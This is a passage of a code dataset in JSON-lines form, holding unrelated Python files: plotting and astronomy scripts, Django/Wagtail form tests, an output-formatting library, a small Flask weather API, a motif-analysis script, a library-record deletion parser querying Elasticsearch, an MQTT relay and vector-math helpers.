abs(i) < 10:\n j = '0'+str(abs(i))\n else:\n j = str(abs(i))\n\n\n if i <= 0:\n j = '+'+j\n\n else:\n j = '-'+j\n\n\n print (j)\n base_files = glob.glob('/unsafe/tok2/LocalOutputs/RT/General/vacuum/base'+j+'*.txt')\n print (base_files)\n base_file = base_files[0]\n \n plasma_files = glob.glob('/unsafe/tok2/LocalOutputs/RT/General/*_x='+j+'*.txt')\n\n t_base = plotPHOTON(base_file)\n \n xx = []\n yy = []\n\n for file in plasma_files:\n t = plotPHOTON(file)\n dt = abs(t_base - t)\n dt=dt*factor # milliseconds\n\n #ax1.plot(xvals, dt)\n E_id = file[-5:-4]\n \n\n if E_id == '1':\n impacts1.extend([float(j)])\n delta_t1.extend([dt[0]])\n # ax1.plot(xvals, dt)\n\n if E_id == '2':\n impacts2.extend([float(j)])\n delta_t2.extend([dt[0]])\n # ax2.plot(xvals, dt)\n\n\n if E_id == '3':\n impacts3.extend([float(j)])\n delta_t3.extend([dt[0]])\n # ax3.plot(xvals, dt)\n\n\nax1.scatter(impacts1,delta_t1, c='tab:red')\nax1.scatter(impacts2,delta_t2, c='tab:green')\nax1.scatter(impacts3,delta_t3, c='tab:blue')\n\n\nax1.plot(impacts1,delta_t1, c='tab:red')\nax1.plot(impacts2,delta_t2, c='tab:green')\nax1.plot(impacts3,delta_t3, c='tab:blue')\n#Plot details\n#ax3.set_xlabel(r'x [$r_g$]', fontsize = 18)\n\nax1.set_ylabel(r'$\\delta t / P$', fontsize = 
18)\n#ax2.set_ylabel(r'$\\delta t / P$', fontsize = 18)\n#ax3.set_ylabel(r'$\\delta t / P$', fontsize = 18)\nax1.set_xlabel(r'$\\alpha \\, [r_g]$', fontsize = 18)\n#ax2.set_yscale('log')\n\n#ax1.get_xaxis().set_visible(False)\n#ax2.get_xaxis().set_visible(False)\n#ax1.set_xlim(45,50)\n#ax1.set_ylim(0.035,0.05)\n#plt.xlabel(r'$\\alpha$[rg]')\n#plt.ylabel(r'$\\delta t / P$')\n#plt.axhline(0.0, c='0.8', linestyle = '--')\nplt.show()\n\n\n","sub_path":"Tools/temporal_dispersion.py","file_name":"temporal_dispersion.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"261949323","text":"\"\"\"\ntest_wagtailformblocks\n----------------------------------\n\nTests for `wagtailformblocks` module.\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport json\n\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom wagtailformblocks.models import (BaseForm, EmailForm, FormField,\n FormSubmission)\n\n\ndef make_formfields(form):\n FormField.objects.create(\n form=form,\n sort_order=1,\n label=\"Your email\",\n field_type='email',\n required=True,\n )\n\n FormField.objects.create(\n form=form,\n sort_order=2,\n label=\"Your message\",\n field_type='multiline',\n required=True,\n )\n\n FormField.objects.create(\n form=form,\n sort_order=3,\n label=\"Your choices\",\n field_type='checkboxes',\n required=False,\n choices='foo,bar,baz',\n )\n\n\ndef get_json(response):\n if hasattr(response, 'json'): # Django >= 1.9\n return response.json()\n try:\n return json.loads(response.content)\n except TypeError:\n # Happens when response.content is of type bytes (Python 3)\n return json.loads(response.content.decode())\n\n\nclass TestViews(TestCase):\n def setUp(self):\n self.baseform = BaseForm.objects.create()\n self.emailform = EmailForm.objects.create()\n make_formfields(self.emailform)\n\n def tearDown(self):\n pass\n\n def test_process(self):\n url = reverse('wagtailformblocks_process',\n kwargs={'pk': self.baseform.id})\n data = {}\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n json_resp = get_json(resp)\n self.assertEqual(json_resp['message'],\n 'Thank you, the form has been submitted.')\n\n def test_process_form_validation(self):\n url = reverse('wagtailformblocks_process',\n kwargs={'pk': self.emailform.id})\n data = {}\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 400)\n\n json_resp = get_json(resp)\n self.assertEqual(json_resp['message'],\n 'There was an error processing the form')\n\n data = {\n 'your-email': 'john@doe.com',\n 'your-message': 'This is a test message'\n }\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n\n def test_process_form_store_submission(self):\n url = reverse('wagtailformblocks_process',\n kwargs={'pk': self.emailform.id})\n data = {\n 'your-email': 'john@doe.com',\n 'your-message': 'This is a test message'\n }\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(FormSubmission.objects.count(), 0)\n\n self.emailform.store_submission = True\n self.emailform.save()\n resp = self.client.post(url, data)\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(FormSubmission.objects.count(), 1)\n","sub_path":"tests/test_wagtailformblocks.py","file_name":"test_wagtailformblocks.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
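The `plotPHOTON` helper in temporal_dispersion.py keeps only samples on the ingoing branch of the trajectory (`pr < 0`) and then inverts t(x) with `interp1d` to read off the arrival time at a fixed x. A toy version of that inversion with a fabricated straight-line ray (all numbers here are made up for illustration):

```python
import numpy as np
import scipy.interpolate

# Hypothetical ray: t and x sampled along the trajectory.
t = np.linspace(0.0, 100.0, 200)
x = 60.0 - 0.5 * t            # x(t) decreasing toward the source
pr = np.gradient(x, t)        # radial-momentum proxy: negative when ingoing
mask = pr < 0                 # keep the ingoing branch, as plotPHOTON does
f = scipy.interpolate.interp1d(x[mask], t[mask])
print(f(10.0))                # time coordinate when the photon crosses x = 10
```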
+{"seq_id":"433103232","text":"#!/usr/bin/env python3\n\n# Copyright 2014 SolidFire, Inc. All rights reserved.\n#\n# A library of classes and functions for handling common parameters, output modes and more.\n#\n\nimport argparse\nimport json\nimport logging\nimport os\nimport shutil\nimport string\nimport sys\nfrom collections import MutableMapping\nfrom datetime import datetime, timedelta\nfrom re import match\n\n# Make sure we are in Python3+\nif sys.version_info[0] <= 2:\n mesg = \"common.ioutils -- is incompatibile with Python2\"\n sys.stderr.write(mesg + '\\n')\n raise ImportError(mesg)\n\n\nclass DateTimeParser(object):\n \"\"\"Parser for datetime.datetime objects, for use with an arparse.ArgumentParser\n\n Allowed formats:\n YYYY-MM-DD Uses time 00:00:00 by default; see 'end' parameter.\n YYYY-MM-DD'T'HH:MM:SS As expected\n YYYY-MM-DD'T'HH:MM:SS.NNNNNN As expected.\n [-+]NUM{'days','hours'} Offset time.\n\n Constructor parameters:\n end = if true then use the end of the day if no time is specified.\n base = a datetime.datetime from which the offset time is applied.\"\"\"\n def __init__(self, end=False, base=None):\n self.end = end\n self.base = base or datetime.now()\n\n @staticmethod\n def add_parser_args(parser, after=True, before=True, prefix='', extra='events'):\n fmt = ('Restrict query to {} at or {} a UTC time; YYYY-MM-DD[\"T\"HH:MM:SS[.NNNNNN]\"Z\"]' +\n ' If time of day is omitted, it defaults to midnight at the {} of the given day.' +\n ' (default: %(default)s)')\n if before:\n tag = '--{}before'.format(prefix)\n parser.add_argument(tag, metavar='ENDTIME', help=fmt.format(extra, 'before', 'end'),\n type=DateTimeParser(True), default=None if before is True else before)\n if after:\n tag = '--{}after'.format(prefix)\n parser.add_argument(tag, metavar='STARTIME', help=fmt.format(extra, 'after', 'start'),\n type=DateTimeParser(False), default=None if after is True else after)\n return parser\n\n @staticmethod\n def update_query(query, opts, parser, prefix='', throw=False):\n # Updates the MongoDB query for this timestamp.\n prefix = prefix.replace('-', '_')\n before = getattr(opts, prefix + 'before')\n after = getattr(opts, prefix + 'after')\n if not before and not after:\n return query\n\n key = '@timestamp'\n if key not in query:\n query[key] = {}\n if before:\n query[key]['$lte'] = before\n if after:\n query[key]['$gte'] = after\n\n if before and after and before < after:\n error = \"Invalid Time Range: specified ENDTIME ({}) was before STARTIME ({})\".format(before, after)\n if throw:\n raise ValueError(error)\n parser.error(error)\n\n return query\n\n def __call__(self, text):\n timeformat = ''\n for dateOnly, tfmt in ((1, '%Y-%m-%d'), (0, 'T%H:%M:%S'), (0, '.%f')):\n timeformat += tfmt\n for suff in ('', 'Z'):\n try:\n date = datetime.strptime(text, timeformat + suff)\n if dateOnly and self.end:\n date = datetime.combine(date, datetime.max.timetz())\n return date\n except ValueError:\n pass\n\n # Append \"s\" to allow non-plural input, eg: \"+1 week\"\n offset = match(\" *([-+]?[1-9][0-9]*(.[0-9][0-9]*)?) 
*(weeks|days|hours|minutes|seconds|microseconds)\", text.lower() + \"s\")\n if offset:\n param = {offset.group(3): float(offset.group(1))}\n return self.base + timedelta(**param)\n\n EPOCH = '([1-9][0-9]{9}(\\\\.[0-9]*)?)'\n for pattern in ('{} *epoch', '@{}', 'epoch *{}', '{}'):\n epoch = match(pattern.format(EPOCH), text.lower())\n if epoch:\n return datetime.utcfromtimestamp(float(epoch.group(1)))\n\n raise ValueError(\"Cannot parse time: \\\"{}\\\"\".format(text))\n\n\ndef write_to_file(filename, data, tmpsuffix='.tmp', backup='~', mode='w'):\n \"\"\"Safely overwrites FILENAME the ability to safely overwrite a file by creating a temporary and renaming.\"\"\"\n tempfile = filename + tmpsuffix\n try:\n with open(tempfile, mode) as outfd:\n outfd.write(data)\n if backup:\n shutil.copyfile(filename, filename + backup)\n os.rename(tempfile, filename)\n finally:\n try:\n os.remove(tempfile)\n except OSError:\n pass\n\n\nclass SpecialNoneFormatter(string.Formatter):\n \"\"\"Formatter to convert None into an empty (or other) string rather than the literal 'None'.\"\"\"\n class SpecialNoneType(object):\n def __init__(self, nullstr):\n self.nullstr = nullstr\n\n def __nonzero__(self):\n return False\n\n def __str__(self):\n return self.nullstr\n\n def __getattr__(self, name):\n return self\n\n def __getitem__(self, idx):\n return self\n\n def __init__(self, nullstr=\"\"):\n self.none = SpecialNoneFormatter.SpecialNoneType(nullstr)\n\n def get_value(self, field_name, args, kwds):\n v = string.Formatter.get_value(self, field_name, args, kwds)\n if v is None:\n return self.none\n if isinstance(v, str):\n for ch, esc in ('\"', '\"\"'), ('\\\\', '\\\\\\\\'), ('\\t', '\\\\t'), ('\\n', '\\\\n'), ('\\r', '\\\\r'):\n if ch in v:\n v = v.replace(ch, esc)\n v = '\"' + v + '\"'\n return v\n\n\nclass OutputMode(object):\n \"\"\"Supports output of JSON data in CSV, JSON or keyed text formats.\"\"\"\n def __init__(self, parser, separator='_', outfile=sys.stdout):\n self.parser = parser\n self.mode = 'text'\n self.first = True\n self.flatten = None\n self.separator = separator\n self.parser.add_argument('--out', help=\"Specify the filename in which to save the output.\",\n default=outfile, type=argparse.FileType('w'))\n group = self.parser.add_mutually_exclusive_group(required=False)\n group.add_argument('--text', help=argparse.SUPPRESS, dest='text', action='store_true')\n group.add_argument('--csv', help=argparse.SUPPRESS, dest='csv', action='store_true')\n group.add_argument('--json', help=argparse.SUPPRESS, dest='json', action='store_true')\n parser.add_argument('--none', dest='nullstr', help='Except in JSON output, replace null values ' +\n 'values with NULLSTR (default is an empty string)')\n group.add_argument('--mode', dest='mode', help='Output format, one of: [\"csv\", \"text\", \"json\"]; ' +\n ' Default is \"%(default)s\", or use just the name (eg: \"--csv\")', default='json')\n\n def _flatten(self, obj, key=None):\n items = []\n for k, v in obj.items():\n new_key = key + self.separator + k if key else k\n if isinstance(v, MutableMapping):\n items.extend(self._flatten(v, new_key).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\n def new_section(self):\n self.first = True\n return self\n\n def emit_line(self, opts, data, keys=None, flatten=None, new_data=False):\n if new_data or self.first:\n self.resolve_mode(opts)\n self.flatten = flatten if flatten is not None else (self.mode != 'json')\n self.out = opts.out\n\n datum = self._clean(data, self.flatten)\n if new_data or 
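The offset branch of `DateTimeParser.__call__` is the least obvious part: an "s" is appended to the input so that singular units ("+1 day") still match the plural-only pattern, and the matched unit name is passed straight to `timedelta` as a keyword. A toy extraction of just that branch, using the same regex:

```python
from datetime import datetime, timedelta
from re import match

def parse_offset(text, base):
    # Appending "s" lets "+1 day" match the plural-only alternatives.
    m = match(r" *([-+]?[1-9][0-9]*(.[0-9][0-9]*)?) *(weeks|days|hours|minutes|seconds|microseconds)",
              text.lower() + "s")
    if m:
        return base + timedelta(**{m.group(3): float(m.group(1))})
    raise ValueError("Cannot parse time: %r" % text)

print(parse_offset("+2 days", datetime(2019, 1, 1)))    # 2019-01-03 00:00:00
print(parse_offset("-12 hours", datetime(2019, 1, 1)))  # 2018-12-31 12:00:00
```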
self.first:\n self.first = False\n self.keys = keys or sorted(datum.keys())\n\n if self.mode == 'json':\n self.func = lambda datum: json.dumps(datum) + \"\\n\"\n else:\n if self.mode == 'text':\n fmt = \" \".join([\"%s={%s}\" % (key.replace(self.separator, '.'), key) for key in self.keys]) + \"\\n\"\n else:\n self._write('\"' + ('\",\"'.join(self.keys)) + '\"\\n')\n fmt = \",\".join([\"{%s}\" % key for key in self.keys]) + \"\\n\"\n logging.debug('FMT: \"\"\"%s\"\"\"' % fmt)\n formatter = SpecialNoneFormatter(self.nullstr)\n self.func = lambda datum: formatter.format(fmt, **datum)\n self._write(self.func(datum))\n\n def emit(self, opts, data, keys=None, flatten=None):\n new_data = True\n assert isinstance(data, (tuple, list))\n for row in data:\n self.emit_line(opts, row, keys, flatten=flatten, new_data=new_data)\n new_data = False\n\n def resolve_mode(self, opts):\n if opts.mode:\n self.mode = opts.mode.lower()\n if self.mode not in ('text', 'csv', 'json'):\n self.parser.error(\"Invalid mode: --mode={}\".format(opts.mode))\n return\n if opts.text:\n self.mode = 'text'\n elif opts.csv:\n self.mode = 'csv'\n elif opts.json:\n self.mode = 'json'\n\n # Pick the nullstr from opts or from the mode default.\n self.nullstr = opts.nullstr\n if self.nullstr is None and self.mode in ('text', 'csv'):\n self.nullstr = ''\n else:\n assert self.nullstr or self.mode == 'json'\n logging.debug(\"NULLSTR({}) = [{}] '{}'\".format(self.mode, type(self.nullstr), self.nullstr))\n return self.mode\n\n def _clean(self, obj, flatten):\n if '@timestamp' in obj:\n del obj['@timestamp']\n return self._flatten(obj) if flatten else obj\n\n # Can be overridden for testing.\n def _write(self, output):\n self.out.write(output)\n","sub_path":"matilda_scripts/recorder/common/ioutils.py","file_name":"ioutils.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"477278294","text":"import numpy as np\nimport datetime as dt\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n\n# Database Setup\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#Create our session from Python to the DB\nsession = Session(engine)\n\n# Flask Setup\napp = Flask(__name__)\n\n\n#Flask Routes\n@app.route(\"/\")\ndef home():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/start
\"\n f\"/api/v1.0/start/end
\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n \"\"\"Lets look into the precipitation data.\"\"\"\n #Query last 12 months prcp data\n precip_results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= year_earlier_date).group_by(Measurement.date).all()\n prcp_data = []\n for date, prcp in precip_results:\n prcp_dict = {}\n prcp_dict[\"date\"] = date\n prcp_dict[\"prcp\"] = prcp\n prcp_data.append(prcp_dict)\n return jsonify(prcp_data)\n\n@app.route(\"/api/v1.0/stations\")\ndef station():\n stat_results = session.query(Station.station, Station.name).all()\n #stat_data = pd.read_sql(stat_results.statement, stat_results.session.bind)\n return jsonify(stat_results)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n #12 month earlier\n year_earlier_date = '2016-08-23'\n\n #Most active station\n most_active_stid = 'USC00519281'\n tobs_results = session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= year_earlier_date).filter(Measurement.station == most_active_stid).order_by(Measurement.tobs).all()\n return jsonify(tobs_results) \n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n session = Session(engine)\n temp1_results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).all()\n session.close()\n return jsonify(temp1_results)\n \n\n@app.route(\"/api/v1.0//\")\ndef startend_date(start,end):\n session = Session(engine)\n temp2_results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n session.close()\n return jsonify(temp2_results)\n\nsession.close()\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"541216099","text":"\"\"\"Python: Programming in Context (2e)\"\"\"\n__author__ = 'ncoop'\n\nfrom chapter2 import *\n\nimport math\nsides = 10\ndiff = 1\nprint(\"{:5s} | {:s} | {:s} | {:s} | {:s}\".format(\n \"sides\", \"arch_pi\".center(18),\n \"math.pi - arch_pi\".center(18), \"math.pi - leib_pi\".center(18), \"math.pi - wall_pi\".center(18)))\nwhile diff > 1e-5:\n arch_pi = archimedes(sides)\n diff = math.pi - arch_pi\n print(\"{:5d} | {:.16f} | {:.16f} | {:.16f} | {:.16f}\".format(\n sides, arch_pi, diff, math.pi - leibniz_mod(sides), math.pi - wallis_mod(sides)))\n sides += 10\nprint()\n\nprint(\"%2s | %19s | %19s\" % (\"n\", \"fibonacci\".center(19), \"factorial\".center(19)))\nprint(\"%2s | %9s %9s | %9s %9s\" % (\"\", \"iterative\", \"recursive\", \"iterative\", \"recursive\"))\nfor i in range(10):\n j = i+1\n print(\"%2d | %9d %9d | %9d %9d\" % (j, fibonacci(j), fib_rec(j), factorial(j), fact_rec(j)))\n","sub_path":"chapter2-tests.py","file_name":"chapter2-tests.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"570084085","text":"#!/usr/bin/env python \n# Copyright (c) 2009-2010 Simon van Heeringen \n#\n# This module is free software. 
You can redistribute it and/or modify it under \n# the terms of the MIT License, see the file COPYING included with this \n# distribution.\n\nfrom gimmemotifs.fasta import *\nfrom gimmemotifs.motif import *\nimport pp\nimport sys\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option(\"-p\", \"--pwmfile\", dest=\"pwmfile\", help=\"File with pwms\", metavar=\"FILE\")\nparser.add_option(\"-f\", \"--fastafile\", dest=\"fastafile\", help=\"Fasta formatted file\", metavar=\"FILE\")\nparser.add_option(\"-w\", \"--width\", dest=\"width\", help=\"Set width to W (default: determined from fastafile)\", metavar=\"W\", type=\"int\")\nparser.add_option(\"-i\", \"--ids\", dest=\"ids\", help=\"Comma-seperated list of motif ids to plot in ROC (default is all ids)\", metavar=\"IDS\")\nparser.add_option(\"-c\", \"--cutoff\", dest=\"cutoff\", help=\"Cutoff to use (default 0.95)\", type=\"float\", default=0.95)\n\n(options, args) = parser.parse_args()\n\ndef motif_localization(fastafile, motif, width, outfile, cutoff=0.9):\n\tNR_HIST_MATCHES = 100\n\tfrom gimmemotifs.utils import plot_histogram, ks_pvalue\n\tfrom gimmemotifs.fasta import Fasta\n\tfrom numpy import array\n\n\tmatches = motif.pwm_scan(Fasta(fastafile), cutoff=cutoff, nreport=NR_HIST_MATCHES)\n\tif len(matches) > 0:\n\t\tar = []\n\t\tfor a in matches.values():\n\t\t\tar += a\n\t\tmatches = array(ar)\n\t\tp = ks_pvalue(matches, width - len(motif))\n\t\tplot_histogram(matches - width / 2 + len(motif) / 2, outfile, xrange=(-width / 2, width / 2), breaks=21, title=\"%s (p=%0.2e)\" % (motif.id, p), xlabel=\"Position\")\n\t\treturn motif.id, p\n\telse:\n\t\treturn motif.id, 1.0\n\nif not options.fastafile and not options.pwmfile:\n\tparser.print_help()\n\tsys.exit()\n\nfastafile = options.fastafile\npwmfile = options.pwmfile\n\nlwidth = options.width\nif not lwidth:\n\tf = Fasta(fastafile)\n\tlwidth = len(f.items()[0][1])\n\tf = None\n\njob_server = pp.Server(secret=\"pumpkinrisotto\")\njobs = []\nmotifs = pwmfile_to_motifs(pwmfile)\nids = [motif.id for motif in motifs]\nif options.ids:\n\tids = options.ids.split(\",\")\n\nfor motif in motifs:\n\tif motif.id in ids:\n\t\toutfile = os.path.join(\"%s_histogram\" % motif.id)\n\t\tjobs.append(job_server.submit(motif_localization, (fastafile,motif,lwidth,outfile, options.cutoff), (),()))\n\nfor job in jobs:\n\tjob()\n","sub_path":"scripts/motif_localization_plots.py","file_name":"motif_localization_plots.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"98121429","text":"#!/usr/bin/python3\n# coding: utf-8\n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n# \n# forked from the FINC Project\n\n\n\"\"\"\nBSZ deletion line parsing to delete Records out of an elasticsearch server\ndeletions.py $(find -L /var/finc/data/import/002 -type f -name \"LOEPPN-*\")\n\"\"\"\n\n\n__version_info__ = ('2019','04','29')\n__version__ = '-'.join(__version_info__)\n\n# from finc.mappings import * \n# from finc.services import *\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\nimport logging\nimport argparse\nimport datetime\nimport time, os\nimport sys\nimport traceback\nfrom requests import get, delete\n\n# root = logging.getLogger()\n# if root.handlers:\n# for handler in root.handlers:\n# root.removeHandler(handler)\n\ngetstrings=[\"http://194.95.145.44:9200/persons/schemaorg/\",\n \"http://194.95.145.44:9200/works/schemaorg/\",\n \"http://194.95.145.44:9200/tags/schemaorg/\",\n \"http://194.95.145.44:9200/events/schemaorg/\",\n \"http://194.95.145.44:9200/orga/schemaorg/\",\n \"http://194.95.145.44:9200/geo/schemaorg/\",\n \"http://194.95.145.44:9200/swb-aut/mrc/\",\n #\"http://194.95.145.24:9201/finc-main/mrc/_search?q=980.__.a.keyword=\"\n ]\n\nclass LoeschLeser(object):\n\n def __init__(self, args):\n self.logger = logging.getLogger(__file__)\n self.ppn_deletions = {}\n self.epn_deletions = {}\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n pass\n\n def process_line(self, line, since=None, ilns=[]):\n\n # dissect line\n __date = line[0:5] # YYDDD, WTF\n __time = line[5:11] # HHMMSS\n\n __date_sane = ''\n try:\n __date_sane = (\n datetime.datetime(\n int('20%s' % __date[0:2]), # year\n 1, # month\n 1, # date\n int(__time[0:2]), # hour\n int(__time[2:4]), # minute\n int(__time[4:6])) + \n datetime.timedelta(int(__date[2:5])-1) # the delta, #1388\n ) #.isoformat() # .strftime('%Y%m%d%H%M')\n # print(__date_sane, file=sys.stderr)\n except Exception as exc:\n self.logger.error('error parsing date: %s' % exc)\n # print('error parsing date: %s' % exc, file=sys.stderr)\n \n d_type = line[11:12]\n # xpn, since this could be ppn or epn; it is an epn, if d_type == 9; it is a ppn if d_type == A\n # 2018-05-17: #13108 longer EPNs\n ## __xpn = line[12:21]\n __xpn = line[12:22]\n ## __iln = line[21:25] # only in epns\n __iln = line[22:26] # only in epns\n\n\n # filter\n\n if since:\n if __date_sane < since:\n # print(\"not adding ppn/epn of date %s\" % __date_sane, file=sys.stderr)\n return\n\n # https://wiki.bsz-bw.de/doku.php?id=v-team:daten:datendienste:sekkor\n if d_type == '9':\n self.epn_deletions[__xpn] = __date_sane\n\n if ilns and len(__iln) > 0: # no iln for ppns / title deletions\n intiln = int(__iln)\n if intiln not in ilns:\n self.logger.debug(\"not adding ppn/epn to iln %s\" % __iln)\n return\n\n if d_type == 'A':\n self.ppn_deletions[__xpn] = __date_sane\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='deletions.py', description='delete bsz ppns out of your EFRE LOD Elasticsearch Server')\n parser.add_argument('-V', '--version', action='version', version=\"{prog}s ({version})\".format(prog=\"%(prog)\", version=__version__))\n # parser.add_argument('-v', '--verbose', action='store_true')\n parser.add_argument('infile', type=str, nargs='*')\n parser.add_argument('--since', type=str, help='collect ppns/epns since given date only, yyyy-mm-dd format') #, default='2013-01-01')\n parser.add_argument('--ilns', type=str, help='collect ppns/epns of specified ilns only, comma separated') # 5,10,20,27,48,50,57,61,89,97,161,400\n parser.add_argument('--dtype', 
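The date handling in `process_line` is worth isolating: BSZ deletion lines carry the day as YYDDD (two-digit year plus day-of-year) and the time as HHMMSS, so the code builds January 1 of year 20YY at the given time and adds DDD-1 days. A toy version of just that conversion:

```python
from datetime import datetime, timedelta

def parse_bsz_stamp(yyddd, hhmmss):
    # January 1 of 20YY at HH:MM:SS, then advance by (day-of-year - 1) days.
    base = datetime(int("20" + yyddd[0:2]), 1, 1,
                    int(hhmmss[0:2]), int(hhmmss[2:4]), int(hhmmss[4:6]))
    return base + timedelta(int(yyddd[2:5]) - 1)

print(parse_bsz_stamp("19032", "142500"))  # day 32 of 2019 -> 2019-02-01 14:25:00
```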
type=str, help='output either only ppns (ppn), epns (epn), or both (all)', default=\"ppn\")\n\n args = parser.parse_args()\n\n date_since = None\n if args.since:\n date_since = datetime.datetime.strptime(args.since, '%Y-%m-%d')\n\n ilns = []\n if args.ilns:\n ilns = [int(iln) for iln in args.ilns.split(',')]\n\n logging.basicConfig(\n # filename='/var/log/mdma.log',\n filename='/dev/stderr',\n filemode='w',\n level=logging.INFO,\n format='%(asctime)s | %(levelname)8s | %(name)s | %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n # multiple with ... python 2.7 or contextlib\n\n start = datetime.datetime.now()\n\n with LoeschLeser(args) as lm:\n for infile in args.infile:\n lm.logger.info(\"reading file %s\" % infile)\n with open(infile) as handle:\n\n # timestamp = datetime.datetime.strptime(time.ctime(os.path.getctime(args.infile)), \"%a %b %d %H:%M:%S %Y\")\n\n for i, line in enumerate(handle, 1):\n try:\n lm.process_line(line, since=date_since, ilns=ilns)\n except Exception as exc:\n lm.logger.error('error parsing %s: %s' % (line, exc))\n lm.logger.error(traceback.format_exc())\n\n # lm.logger.info(\"%d deletions in %d seconds (%d bytes). printing to stdout ...\" % ( len(lm.deletions), ( datetime.datetime.now() - start ).seconds, sys.getsizeof(lm.deletions)) )#, file=sys.stderr)\n if args.dtype in ('all', 'epn'):\n for xpn,dat in lm.epn_deletions.items():\n print(\"%s %s\" % (xpn, dat.strftime('%Y%m%d%H%M')))\n outputset=set()\n if args.dtype in ('all', 'ppn'):\n for xpn,dat in lm.ppn_deletions.items():\n for getstring in getstrings:\n r=get(getstring+xpn.strip())\n if r.ok and r.json()[\"found\"]:\n outputset.add(getstring[:25]+\"/\"+r.json()[\"_index\"]+\"/\"+r.json()[\"_type\"]+\"/\"+r.json()[\"_id\"])\n #delete(getstring[:25]+\"/\"+r.json()[\"_index\"]+\"/\"+r.json()[\"_type\"]+\"/\"+r.json()[\"_id\"])\n for item in outputset:\n print(item)\n#\t\t\t\tprint(\"%s\" % (xpn))\n","sub_path":"helperscripts/deletions.py","file_name":"deletions.py","file_ext":"py","file_size_in_byte":6929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"257891817","text":"from app import mqtt, socketio\nfrom flask import Blueprint\nimport json\n\ncommunications = Blueprint('communications', __name__)\n\n\n@mqtt.on_connect()\ndef handle_connect(client, userdata, flags, rc):\n mqtt.subscribe('test')\n\n\n@mqtt.on_message()\ndef handle_mqtt_message(client, userdata, message):\n data = dict(\n topic=message.topic,\n payload=message.payload.decode()\n )\n socketio.emit('new_data', json.dumps({\"message\": data['payload']}))\n\n\n# @socketio.on('test_socket')\n# # def handle_socketio_test(message):\n# # socketio.emit('new_data', json.dumps({\"test\": message}))","sub_path":"app/communications/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"120786444","text":"import numpy as np\nimport scipy.stats as st\n\nEXPONENTIAL_DIST = st.expon\n\nunit_normalize = lambda v: v/np.linalg.norm(v)\ndegress_between = lambda v1, v2: np.rad2deg(angle_between(v1, v2))\nedot = lambda v1, v2: np.einsum('ij,ij->i', v1, v2)\n\ndef angle_between(v1, v2):\n v1_u = unit_normalize(v1)\n v2_u = unit_normalize(v2)\n angle = np.arccos(np.dot(v1_u, v2_u))\n if np.isnan(angle):\n if (v1_u == v2_u).all():\n return 0.0\n else:\n return np.pi\n return angle\n\ndef angles_between_many_unit_vectors(v1, v2):\n \"\"\"Requires unit vectors\"\"\"\n return 
